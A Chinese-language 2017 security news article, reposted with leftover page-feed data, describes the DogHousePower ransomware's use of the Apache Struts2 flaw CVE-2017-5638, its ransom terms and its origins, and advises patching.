黑基网 首页 资讯 安全圈 查看内容

勒索软件武器库“再添新军”,Windows Server Web服务器安全成灾

2017-11-9 21:36| 投稿: xiaotiger |来自: 互联网

摘要: 导语近日,网络安全公司Canthink的网络安全实验室发现了一款名为“DogHousePower”的新型勒索软件,该软件专门针对在Windows Server操作系统上运行的Web服务器和数据库服务器,而且有趣的是,它还被托管在GitHub上。 ...

导语

近日,网络安全公司Canthink的网络安全实验室发现了一款名为“DogHousePower”的新型勒索软件,该软件专门针对在Windows Server操作系统上运行的Web服务器和数据库服务器,而且有趣的是,它还被托管在GitHub上。

勒索软件分析

最开始,我们使用Hybrid Analysis VxStream沙箱和Windows虚拟机对该勒索软件的二进制文件“2.exe”进行了分析,结果发现,DogHousePower需要通过利用ApacheStruts2中的一个已知漏洞(CVE-2017-5638)来发起攻击,并使用Microsoft PowerShell提供勒索软件有效载荷,来进一步下载和传播勒索软件。

赎金需求

赎金通知中的部分内容显示为中文信息,很可能是被用于误导受害者和分析人员追溯DogHousePower的真实消息来源。此外,赎金金额要求是相当于5000元人民币的比特币,这可能表明,DogHousePower勒索软件针对的是亚洲或源自亚洲的人群。

根据赎金通知要求,受害人需要在3天之内向提供的地址支付5000元赎金。勒索者表示,赎金价格可以进行进一步协商,但是如果受害者在3天内未支付5000元赎金,那么赎金金额将上升至价值6000元人民币的比特币,如果超过7天还未支付赎金,那么则需要支付价值7000元人民币的比特币。最后,该赎金通知警告称,如果在13天内没有收到受害者支付的赎金,那么其文件将永远无法解密。

为了在付款后对文件进行解密,勒索者还提供了一个联系电子邮件地址([email protected])供受害者发送赎金、截屏以及ID信息。此外,勒索者还表示,这些被加密的文件将通过电子邮件进行解密,每封电子邮件不应超过10MB。

勒索通知中还提供了多种语言版本,其中包括英语、俄语、西班牙语以及中文等,并提供了一份“在中国如何购买比特币”的说明文档。

攻击者的另一份通知中还表示,他们正在考虑允许用户像往常一样访问Windows、文档以及设置等程序。

勒索软件家族

研究人员在对赎金通知中提供的电子邮件地址和ZCash账户进行研究时发现,DogHousePower很有可能是基于“.BELGIAN_COCOA”、“.MyChemicalRomance4EVER”、“LambdaLocker”、“Pickles”以及“CryPy”勒索软件演变发展而来的。

安全建议

DogHousePower勒索软件针对的是Apache Struts 2中的一个已知漏洞——CVE-2017-5638来发起攻击的,所以,组织机构应该立即修补这一安全漏洞以保护其自身安全。此外,关于该勒索软件的安全更新信息,我们也将进行追踪报道,敬请关注!

, groupId: 6486235523449881102, itemId: 6486235523449881102, type: 2, subInfo: { isOriginal: true, source: 网络安全焦点, time: 2017-11-09 10:26 }, tagInfo: { tags: [{"name":"软件"},{"name":"网络安全"},{"name":"Windows"},{"name":"Windows Server"},{"name":"数字货币"}], groupId: 6486235523449881102, itemId: 6486235523449881102, repin: 0, } }, commentInfo: { groupId: 6486235523449881102, itemId: 6486235523449881102, comments_count: 3, ban_comment: 0 }, mediaInfo: { uid: 6056786006, name: 网络安全焦点, avatar: //p1.pstatp.com/large/97e0012de2676b877ce, openUrl: /c/user/6056786006/, follow: false }, pgcInfo: {"media_info":{"open_url":"/c/user/6056786006/","avatar_url":"https://p1.pstatp.com/large/97e0012de2676b877ce","media_id":6058016092,"name":"网络安全焦点","user_verified":false},"articles":[{"item_id":"6486315265280705037","url":"/item/6486315265280705037","title":"11月安卓系统漏洞小结:31个不得不修复的漏洞"},{"item_id":"6486235523449881102","url":"/item/6486235523449881102","title":"勒索软件武器库“再添新军”,Windows Server Web服务器安全成灾"},{"item_id":"6485855835309212174","url":"/item/6485855835309212174","title":"如何使用python生成反向tcp后门"},{"item_id":"6485500353147044365","url":"/item/6485500353147044365","title":"Tor浏览器高危漏洞 可泄漏用户真实IP地址"}]}, feedInfo: { url: /api/pc/feed/, category: __all__, initList: [{"comments_count":213,"media_avatar_url":"//p3.pstatp.com/large/16aa000624efbb379d9a","is_feed_ad":false,"is_diversion_page":false,"title":"windows10关闭这几个设置,可以让系统变得更加轻快","single_mode":true,"gallary_image_count":8,"middle_mode":false,"has_video":false,"video_duration_str":null,"source_url":"/group/6484824241219830286/","source":"黑客入门学习","more_mode":null,"article_genre":"article","has_gallery":false,"video_play_count":6,"image_url":"//p1.pstatp.com/list/190x124/436900022871597988fb","group_id":"6484824241219830286","is_related":true,"media_url":"/c/user/55712998906/"},{"comments_count":34,"media_avatar_url":"//p10.pstatp.com/large/150e000ccdfa037d9af5","is_feed_ad":false,"is_diversion_page":false,"title":"世界上最流行的操作系统不是 Linux 或 Windows,而是 MINIX","single_mode":true,"gallary_image_count":1,"middle_mode":true,"has_video":false,"video_duration_str":null,"source_url":"/group/6485838539643683341/","source":"Linux技术","more_mode":null,"article_genre":"article","has_gallery":false,"video_play_count":0,"image_url":"//p9.pstatp.com/list/190x124/4379000425319c7e3702","group_id":"6485838539643683341","is_related":true,"media_url":"/c/user/3357852467/"},{"comments_count":153,"media_avatar_url":"//p10.pstatp.com/large/18a50005a0c3b0f6e9aa","is_feed_ad":false,"is_diversion_page":false,"title":"再也不用担心下载文档收费了","single_mode":true,"gallary_image_count":6,"middle_mode":false,"has_video":false,"video_duration_str":null,"source_url":"/group/6485204054728245773/","source":"闪闪的光光","more_mode":null,"article_genre":"article","has_gallery":false,"video_play_count":0,"image_url":"//p9.pstatp.com/list/190x124/43730001d1c9e897560f","group_id":"6485204054728245773","is_related":true,"media_url":"/c/user/5997385132/"},{"comments_count":11,"media_avatar_url":"//p3.pstatp.com/large/ef6001ab9319380cb7f","is_feed_ad":false,"is_diversion_page":false,"title":"成为 windows 牛人必知的操作","single_mode":true,"gallary_image_count":8,"middle_mode":true,"has_video":false,"video_duration_str":null,"source_url":"/group/6485574785412629005/","source":"企鹅小事","more_mode":null,"article_genre":"article","has_gallery":false,"video_play_count":0,"image_url":"//p1.pstatp.com/list/190x124/4376000430f16b9c1a7f","group_id":"6485574785412629005","is_related":true,"media_url":"/c/user/2925781813/"},{"comments_count":121,"media_avatar_url":"//p3.pstatp.com/large/ef6001ab9319380cb7f","is_feed_ad":false,"is_diversion_page":false,"title":"做不成黑客,也应该懂的 Windows 技巧!","single_mode":true,"gallary_image_count":13,"middle_mode":false,"has_video":false,"video_duration_str":null,"source_url":"/group/6484897464238211598/","source":"企鹅小事","more_mode":null,"article_genre":"article","has_gallery":false,"video_play_count":0,"image_url":"//p9.pstatp.com/list/190x124/436e000044ba81e494a7","group_id":"6484897464238211598","is_related":true,"media_url":"/c/user/2925781813/"},{"comments_count":1,"media_avatar_url":"//p1.pstatp.com/large/4d0007583140addefd","is_feed_ad":false,"is_diversion_page":false,"title":"单点登录流程笔记,没啥新意,留个备份","single_mode":true,"gallary_image_count":1,"middle_mode":true,"has_video":false,"video_duration_str":null,"source_url":"/group/6485501453552058894/","source":"全栈进行时","more_mode":null,"article_genre":"article","has_gallery":false,"video_play_count":0,"image_url":"//p3.pstatp.com/list/190x124/437a0000c7e96c3dbab6","group_id":"6485501453552058894","is_related":true,"media_url":"/c/user/5962198367/"},{"comments_count":28,"media_avatar_url":"//p3.pstatp.com/large/ef50008ac962a68910e","is_feed_ad":false,"is_diversion_page":false,"title":"程序员市场需求调查:React.js获前五,AngularJS掉出前十!","single_mode":true,"gallary_image_count":3,"middle_mode":false,"has_video":false,"video_duration_str":null,"source_url":"/group/6485953449308455437/","source":"IT168企业级","more_mode":null,"article_genre":"article","has_gallery":false,"video_play_count":0,"image_url":"//p3.pstatp.com/list/190x124/43810002153d6839ee41","group_id":"6485953449308455437","is_related":true,"media_url":"/c/user/51842642815/"},{"comments_count":4,"media_avatar_url":"//p8.pstatp.com/large/2c65001e1143df9511ba","is_feed_ad":false,"is_diversion_page":false,"title":"Java安全之反序列化漏洞分析","single_mode":true,"gallary_image_count":14,"middle_mode":false,"has_video":false,"video_duration_str":null,"source_url":"/group/6485889142809952782/","source":"程序猿后花园","more_mode":null,"article_genre":"article","has_gallery":false,"video_play_count":0,"image_url":"//p1.pstatp.com/list/190x124/43810000eb1b31464ad5","group_id":"6485889142809952782","is_related":true,"media_url":"/c/user/6906040855/"},{"comments_count":18,"is_related":true,"is_feed_ad":false,"is_diversion_page":false,"title":"GitHub上最好的机器学习开源项目有哪些?","single_mode":true,"gallary_image_count":0,"middle_mode":false,"has_video":false,"video_duration_str":null,"source_url":"/group/6485978514653708558/","source":"头条问答","more_mode":null,"article_genre":"article","has_gallery":false,"video_play_count":0,"image_url":"//p3.pstatp.com/list/190x124/43d8000d63f6fb05997a","group_id":"6485978514653708558"},{"comments_count":10,"media_avatar_url":"//p1.pstatp.com/large/401a000267dd2ac5f8d2","is_feed_ad":false,"is_diversion_page":false,"title":"接口限流处理","single_mode":true,"gallary_image_count":1,"middle_mode":true,"has_video":false,"video_duration_str":null,"source_url":"/group/6486078475932271117/","source":"寻趣家","more_mode":null,"article_genre":"article","has_gallery":false,"video_play_count":0,"image_url":"//p1.pstatp.com/list/190x124/438300026b879c057e75","group_id":"6486078475932271117","is_related":true,"media_url":"/c/user/4006586989/"},{"comments_count":2,"is_related":true,"is_feed_ad":false,"is_diversion_page":false,"title":"转战C/C++做开发(偏软件),除了语言基础和算法外还需要哪些知识?","single_mode":true,"gallary_image_count":1,"middle_mode":false,"has_video":false,"video_duration_str":null,"source_url":"/group/6482934439276970253/","source":"头条问答","more_mode":null,"article_genre":"article","has_gallery":false,"video_play_count":0,"image_url":"//p1.pstatp.com/list/190x124/3ea300080801a8a63899","group_id":"6482934439276970253"},{"comments_count":1,"media_avatar_url":"//p9.pstatp.com/large/382f00164190148c27ef","is_feed_ad":false,"is_diversion_page":false,"title":"Java开发大型互联网深入理解Redis性能调优之redis性能测试","single_mode":true,"gallary_image_count":1,"middle_mode":true,"has_video":false,"video_duration_str":null,"source_url":"/group/6483363259633107469/","source":"图灵学院","more_mode":null,"article_genre":"article","has_gallery":false,"video_play_count":0,"image_url":"//p3.pstatp.com/list/190x124/43550000c5466a4473fe","group_id":"6483363259633107469","is_related":true,"media_url":"/c/user/68178232378/"},{"comments_count":400,"media_avatar_url":"//p1.pstatp.com/large/4338000164d26b0d0b8d","is_feed_ad":false,"is_diversion_page":false,"title":"新型手机病毒出现,支付宝,银行卡钱都不见了","single_mode":true,"gallary_image_count":6,"middle_mode":false,"has_video":false,"video_duration_str":null,"source_url":"/group/6485717271028171277/","source":"雨韩","more_mode":null,"article_genre":"article","has_gallery":false,"video_play_count":0,"image_url":"//p3.pstatp.com/list/190x124/43790003e53915c9e852","group_id":"6485717271028171277","is_related":true,"media_url":"/c/user/72350474839/"},{"media_avatar_url":"//p4.pstatp.com/large/43d7000d663e3a9d3862","is_feed_ad":false,"is_diversion_page":false,"title":"CentOS与Ubuntu的抉择,该选哪个做服务器","single_mode":false,"gallary_image_count":0,"middle_mode":false,"has_video":false,"video_duration_str":null,"source_url":"/group/6485896444929638926/","source":"兔子人开源","more_mode":null,"article_genre":"article","has_gallery":false,"video_play_count":0,"comments_count":28,"group_id":"6485896444929638926","is_related":true,"media_url":"/c/user/61841789796/"},{"comments_count":76,"media_avatar_url":"//p6.pstatp.com/large/2c62000095f82bbb89bc","is_feed_ad":false,"is_diversion_page":false,"title":"工程人必知CAD口诀","single_mode":true,"gallary_image_count":4,"middle_mode":false,"has_video":false,"video_duration_str":null,"source_url":"/group/6483789625809715725/","source":"造价小达人","more_mode":null,"article_genre":"article","has_gallery":false,"video_play_count":2,"image_url":"//p9.pstatp.com/list/190x124/435e00011bccb5a925ad","group_id":"6483789625809715725","is_related":true,"media_url":"/c/user/4682514828/"},{"comments_count":9,"media_avatar_url":"//p3.pstatp.com/large/2542/5808465073","is_feed_ad":false,"is_diversion_page":false,"title":"Excel:你加班 1小时做表格,我用VBA只需1秒种","single_mode":true,"gallary_image_count":5,"middle_mode":false,"has_video":false,"video_duration_str":null,"source_url":"/group/6485871582261543437/","source":"中国统计网","more_mode":null,"article_genre":"article","has_gallery":false,"video_play_count":0,"image_url":"//p1.pstatp.com/list/190x124/437e0002eaa0d8326882","group_id":"6485871582261543437","is_related":true,"media_url":"/c/user/4108306792/"},{"comments_count":8,"media_avatar_url":"//p1.pstatp.com/large/ef5001121659a844a9f","is_feed_ad":false,"is_diversion_page":false,"title":"EXCEL:不会代码也可生成目录,永久收藏","single_mode":true,"gallary_image_count":3,"middle_mode":false,"has_video":false,"video_duration_str":null,"source_url":"/group/6485523441326752269/","source":"EXCEL大本营","more_mode":null,"article_genre":"article","has_gallery":false,"video_play_count":0,"image_url":"//p3.pstatp.com/list/190x124/437b0000b8b707d29091","group_id":"6485523441326752269","is_related":true,"media_url":"/c/user/50063196249/"},{"comments_count":2,"media_avatar_url":"//p10.pstatp.com/large/2bd8001f99e1394f4e5b","is_feed_ad":false,"is_diversion_page":false,"title":"Excel用得好,财务人员的烦恼少了一半!","single_mode":true,"gallary_image_count":8,"middle_mode":false,"has_video":false,"video_duration_str":null,"source_url":"/group/6485954576708010510/","source":"会计学堂","more_mode":null,"article_genre":"article","has_gallery":false,"video_play_count":0,"image_url":"//p3.pstatp.com/list/190x124/437c0002224544a15029","group_id":"6485954576708010510","is_related":true,"media_url":"/c/user/50020143891/"},{"comments_count":54,"media_avatar_url":"//p1.pstatp.com/large/ef5001121659a844a9f","is_feed_ad":false,"is_diversion_page":false,"title":"EXCEL:您从未见过的双条件查找公式","single_mode":true,"gallary_image_count":4,"middle_mode":false,"has_video":false,"video_duration_str":null,"source_url":"/group/6485156543334449678/","source":"EXCEL大本营","more_mode":null,"article_genre":"article","has_gallery":false,"video_play_count":0,"image_url":"//p1.pstatp.com/list/190x124/436e00038ffe33e441d6","group_id":"6485156543334449678","is_related":true,"media_url":"/c/user/50063196249/"},{"comments_count":49,"media_avatar_url":"//p9.pstatp.com/large/401b000136b9cde21b21","is_feed_ad":false,"is_diversion_page":false,"title":"那些年错过的良心软件,你值得拥有!","single_mode":true,"gallary_image_count":6,"middle_mode":false,"has_video":false,"video_duration_str":null,"source_url":"/group/6484423924036665869/","source":"薛定谔之咩","more_mode":null,"article_genre":"article","has_gallery":false,"video_play_count":0,"image_url":"//p3.pstatp.com/list/190x124/4364000285eb1648374a","group_id":"6484423924036665869","is_related":true,"media_url":"/c/user/67804412987/"}] }, shareInfo: { shareUrl: https://m.toutiao.com/i6486235523449881102/, abstract: 导语近日,网络安全公司Canthink的网络安全实验室发现了一款名为“DogHousePower”的新型勒索软件,该软件专门针对在Windows Server操作系统上运行的Web服务器和数据库服务器,而且有趣的是,它还被托管在GitHub上。
小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论


新出炉

返回顶部